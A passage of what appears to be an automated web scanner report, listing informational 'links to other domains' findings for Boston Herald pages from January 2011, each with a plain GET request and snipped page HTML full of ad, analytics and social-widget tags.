...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<div id="bylineArea">
                                        <img class="bylineImage" src="http://cache.heraldinteractive.com/images/siteImages/reporters/rapoport_50.jpg?1=1" alt="Ian R. Rapoport" />
                                       <span class="bold">
...[SNIP]...
<a href="/sports/football/patriots/view.bg?articleid=1312526&amp;format=email"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniEmail.gif"
       alt="Email" />
E-mail</a>
...[SNIP]...
<a href="/sports/football/patriots/view.bg?articleid=1312526&amp;format=text"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPrint.gif"
       alt="Printable" />
Print</a>
...[SNIP]...
<a href="/sports/football/patriots/view.bg?articleid=1312526&amp;format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
       alt="Comments" />
(0) Comments</a>
...[SNIP]...
<a href="#" onclick="textsize('up');return false" title="Increase font size"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/fontLarge.gif" alt="Larger" /></a><a href="#" onclick="textsize('down');return false" title="Decrease font size"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/fontSmall.gif" alt="Smaller" /></a>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>

<a href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', 'Nick Caserio is a Patriots mystery man');" onmouseout="addthis_close();" onclick="return addthis_sendto();"><img class="line_icon" src="/images/siteImages/icons/share-icon-16x16.png" width="16" height="16" alt="Bookmark and Share" style="border:0"/>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
<font color="#888888"> [<a href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nfl/teams/077/team.aspx?id=077" >team stats</a>
...[SNIP]...
<a href="/sports/football/patriots/view.bg?articleid=1312526&amp;format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
alt="Comments" />
(0) Comments&nbsp;&nbsp;|&nbsp;&nbsp;Post / Read Comments</a>
...[SNIP]...
<div id="nextArticleTease" style="display:none">
<img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif">&nbsp;<b>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<div id="trackPhotoGalleryPicArea"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110128/6666ca_tom_01282011.jpg" alt="
UNDER WATCH: Patriots director of..." />
</div>
...[SNIP]...
</div>

<script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<a href="/sports/football/patriots/view/20110128belichick_marks_pats_milestone/"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/85bc2c_bill_01282011.jpg" alt="Bill Belichick marks Patriots&rsquo; milestone" /></a>
...[SNIP]...
<a href="/sports/football/patriots/view/20110128castonzo_follows_lead_blockers/"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/83f74d_bc_01282011.jpg" alt="Anthony Castonzo follows lead blockers" /></a>
...[SNIP]...
<a href="/sports/football/patriots/view/20110128confidence_on_rebound_meriweather_wont_be_bothered_by_naysayers/"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/c68b4a_brand_01282011.jpg" alt="Brandon Meriweather won&rsquo;t be bothered by naysayers" /></a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...

17.158. http://bostonherald.com/track/inside_track/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /track/inside_track/

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /track/inside_track/?position=1 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 56718

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</style>
//-->

   <link rel="alternate" title="The Inside Track - Inside Track - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/track/inside_track/" type="application/rss+xml">
<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Ftrack%2Finside_track%2F&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_rss_small.gif">&nbsp;<a class="orange" style="font-weight:bold" href="/rss">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_enews_small.gif">&nbsp;<a class="orange" style="font-weight:bold" href="/users/register/">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_mobile_small.gif">&nbsp;<a class="orange" style="font-weight:bold" href="/mobile/info.bg">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_news_tips_small.gif">&nbsp;<a class="orange" style="font-weight:bold" href="/about/contact/news_tip.bg">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_home_delivery_small.gif">&nbsp;<a class="orange" style="font-weight:bold" href="/about/home_delivery/">
...[SNIP]...
<a href="/track/inside_track/view/20110129pageant_shaping_up_in_hub/"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/ea43e1_Cheer_01292011.jpg" alt="WORKOUT QUEEN: New England Patriots cheerleader Michelle Nigro will compete to be Miss Boston."></a>
...[SNIP]...
<a href="/track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/bcd2f7_jul_01282011.jpg" alt="Harvard&rsquo;s Hasty Pudding 2011 Woman of the Year award is presented to actress Julianne Moore who laughs with a Mark Walberg character."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Gallery"><a href="/track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/srvc=trak&position=">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniVideo.gif" alt="Video"><a href="/track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/srvc=trak&position=">
...[SNIP]...
<a href="/track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/a37654_sheen_01282011.jpg" alt="Charlie Sheen."></a>
...[SNIP]...
<a href="/track/inside_track/view/20110128tracked_down_deion_branch_jarvis_green_kevin_faulk_and_more_1/"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/5e8b2b_ben_01282011.jpg" alt="Former Patriots defensive end Jarvis Green celebrates
his birthday with a cake replica of Gillette Stadium.">
</a>
...[SNIP]...
<a href="/track/inside_track/view/20110128we_hear_mitt_romney_david_letterman_andrew_weisblum_and_more/"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/5eb1a6_mitt_01282011.jpg" alt="Mitt Romney."></a>
...[SNIP]...
<a href="/track/inside_track/view/20110127boy_banders_faithful_to_fenway/"><img src="http://multimedia.heraldinteractive.com/images/20110126/stp/88a799_NKOTB_01272011.jpg" alt="Brian Littrell, Jonathan Knight, Howie Dorough, Donnie Wahlberg, Jordan Knight, Joey McIntyre, and Danny Wood jump in front of the Green Monster yesterday after announcing they will play at Fenway Park for a summer show as NKOTBSB."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Gallery"><a href="/track/inside_track/view/20110127boy_banders_faithful_to_fenway/srvc=trak&position=">
...[SNIP]...
<a href="/track/inside_track/view/20110127parrotheads_feathers_ruffled_over_tumble/"><img src="http://multimedia.heraldinteractive.com/images/20110126/stp/a582a0_Buffett_01272011.jpg" alt="Jimmy Buffett performing in Gulf Shores, Ala. Buffett fell off the stage at the end of a concert in Sydney, Australia."></a>
...[SNIP]...
<a href="/track/inside_track/view/20110127snow_business_cancels_moores_hasty_pudding_outing/"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/33907a_moore_01282011.jpg" alt="Julianne Moore hams it up with Harvard&rsquo;s Hasty Pudding Theatrical crew in drag as she receives the 2011 Woman of the Year award at Harvard."></a>
...[SNIP]...
<a href="/track/inside_track/view/20110127tracked_down_shaquille_oneal_f_murray_abraham__more/"><img src="http://multimedia.heraldinteractive.com/images/20110126/stp/5ffe30_Shaq_01272011.jpg" alt="Tom O&#x2019;Brien and Tanner Webb with Shaquille O&#x2019;Neal."></a>
...[SNIP]...
<a href="/track/inside_track/view/20110127we_hear_kenny_chesney_natalie_jacobson_kate_bosworth__more/"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/df859e_kchesney012711.jpg" alt="Kenny Chesney."></a>
...[SNIP]...
<a href="/track/inside_track/view/20110126this_is_hwoods_kind_of_town/"><img src="http://multimedia.heraldinteractive.com/images/20110125/stp/d91058_Mark_01272011.jpg" alt="Mark Wahlberg as Micky Ward in &#x2018;The Fighter.&#x2019;"></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Gallery"><a href="/track/inside_track/view/20110126this_is_hwoods_kind_of_town/srvc=trak&position=">
...[SNIP]...
<a href="/track/inside_track/view/20110126mama_mia_jersey_cast_off_to_shores_of_italy/"><img src="http://multimedia.heraldinteractive.com/images/20110125/stp/3701c8_Shore_01272011.jpg" alt="Deena Nicole Cortese of &#x2018;Jersey Shore&#x2019; fame films in Seaside Heights, N.J."></a>
...[SNIP]...
<a href="/track/inside_track/view/20110126tracked_down_chris_lambton_robert_plant_jordan_knight__more/"><img src="http://multimedia.heraldinteractive.com/images/20110125/stp/e312f8_Lamb_01272011.jpg" alt="&#x2018;The Bachelorette&#x2019; wash-outs Chris Lambton and Kasey Kahl at the Celtics-Cavs game."></a>
...[SNIP]...
<a href="/track/inside_track/view/20110125idol_hopefuls_pop_a_hub_fave/"><img src="http://multimedia.heraldinteractive.com/images/20110124/stp/1de6a0_idol_01252011.jpg" alt="&#x2018;American Idol&#x2019; hopeful Ashley Sullivan of
Tewksbury poses prior to performing for the judges.">
</a>
...[SNIP]...
<a href="/track/inside_track/view/20110125and_now_for_the_worst_of_the_worst/"><img src="http://multimedia.heraldinteractive.com/images/20110124/stp/ef57fc_razzie_01252011.jpg" alt="&#x2018;The Twilight Saga: Eclipse&#x2019; stars Robert Pattinson, Kristen Stewart
and Taylor Lautner at the People&#x2019;s Choice Awards on Jan. 5.">
</a>
...[SNIP]...
<div style="display:none;">
<iframe src="http://www.facebook.com/plugins/activity.php?site=http%253A%252F%252Fbostonherald.com&amp;width=300&amp;height=300&amp;header=true&amp;colorscheme=light&amp;font&amp;border_color" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:300px; height:300px;" allowTransparency="true"></iframe>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...

17.159. http://bostonherald.com/track/inside_track/view.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /track/inside_track/view.bg

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /track/inside_track/view.bg?articleid=1312557&srvc=track&position=2 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 44237

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<meta name="PUBDATE" content="Friday, January 28, 2011" />

   <link rel="alternate" title="The Inside Track - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/track/inside_track/" type="application/rss+xml">

   <script type="text/javascript" language="JavaScript">
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Ftrack%2Finside_track%2Fview.bg%3Farticleid%3D1312557%26srvc%3Dtrack%26position%3D3&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/">
<img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer">
</a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<a href="/track/inside_track/view.bg?articleid=1312557&amp;format=email"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniEmail.gif"
       alt="Email" />
E-mail</a>
...[SNIP]...
<a href="/track/inside_track/view.bg?articleid=1312557&amp;format=text"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPrint.gif"
       alt="Printable" />
Print</a>
...[SNIP]...
<a href="/track/inside_track/view.bg?articleid=1312557&amp;format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
       alt="Comments" />
(3) Comments</a>
...[SNIP]...
<a href="#" onclick="textsize('up');return false" title="Increase font size"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/fontLarge.gif" alt="Larger" /></a><a href="#" onclick="textsize('down');return false" title="Decrease font size"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/fontSmall.gif" alt="Smaller" /></a>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>

<a href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', 'Tracked Down: Deion Branch, Jarvis Green, Kevin Faulk and more...');" onmouseout="addthis_close();" onclick="return addthis_sendto();"><img class="line_icon" src="/images/siteImages/icons/share-icon-16x16.png" width="16" height="16" alt="Bookmark and Share" style="border:0"/>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
<font color="#888888"> [<a href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nfl/teams/077/team.aspx?id=077" >team stats</a>
...[SNIP]...
<font color="#888888"> [<a href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nfl/teams/151/team.aspx?id=151" >team stats</a>
...[SNIP]...
<font color="#888888"> [<a href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=sportsnetwork&page=nfl/teams/077/playeraaa.aspx?id=3655,team=077" >stats</a>
...[SNIP]...
<font color="#888888"> [<a href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nfl/teams/077/playeraaa.aspx?id=691,team=077" >stats</a>
...[SNIP]...
<a href="/track/inside_track/view.bg?articleid=1312557&amp;format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
alt="Comments" />
(3) Comments&nbsp;&nbsp;|&nbsp;&nbsp;Post / Read Comments</a>
...[SNIP]...
<div id="nextArticleTease" style="display:block">
<img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif">&nbsp;<b>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<a href="/track/track_gals_tv/"><img style="border: 1px solid rgb(102, 102, 102);" src="http://cache.heraldinteractive.com/images/version5.0/site_images/tg_tv_tease_315x100_animated.gif"></a>
...[SNIP]...
<div id="trackPhotoGalleryPicArea"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110127/5e8b2b_ben_01282011.jpg" alt="Former Patriots defensive end Jarvis..." /></div>
...[SNIP]...
<div id="embedDiv">
<iframe src='http://widgets.mobilelocalnews.com?uid=42b39fdb198522d2bfc6b1f64cd98365' frameborder='0' height='325' width='305' scrolling='no'></iframe>
...[SNIP]...
<a href="/track/inside_track/view/20110125at_least_brady_still_wins_the_hearts_of_gq/"><img src="http://multimedia.heraldinteractive.com/images/20110124/stp/147606_brady_01252011.jpg" alt="At least Tom Brady still wins the hearts of GQ" /></a>
...[SNIP]...
<a href="/sports/football/patriots/view/20110119branch_uses_defeat_as_jet_fuel_for_2011/"><img src="http://multimedia.heraldinteractive.com/images/20110119/stp/996ec1_branch_01192011.jpg" alt="Deion Branch uses defeat as Jet fuel for 2011" /></a>
...[SNIP]...
<a href="/sports/football/patriots/view/20110119offense_points_to_future/"><img src="http://multimedia.heraldinteractive.com/images/20110119/stp/fdc6ad_wes_01192011.jpg" alt="Offense points to future" /></a>
...[SNIP]...
<!--//include: NDN Video Tease //-->
<iframe style="position:relative; margin-bottom: 16px;" src="http://widget.newsinc.com/toppicks_bostonherald_ent.html" frameborder="0" scrolling="no" width="300" height="225"></iframe>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...

17.160. http://bostonherald.com/track/inside_track/view.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /track/inside_track/view.bg

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /track/inside_track/view.bg?articleid=1312557&format=comments&srvc=track&position=2 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 69819

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<meta name="PUBDATE" content="Friday, January 28, 2011" />

   <link rel="alternate" title="The Inside Track - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/track/inside_track/" type="application/rss+xml">

   <script type="text/javascript" language="JavaScript">
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
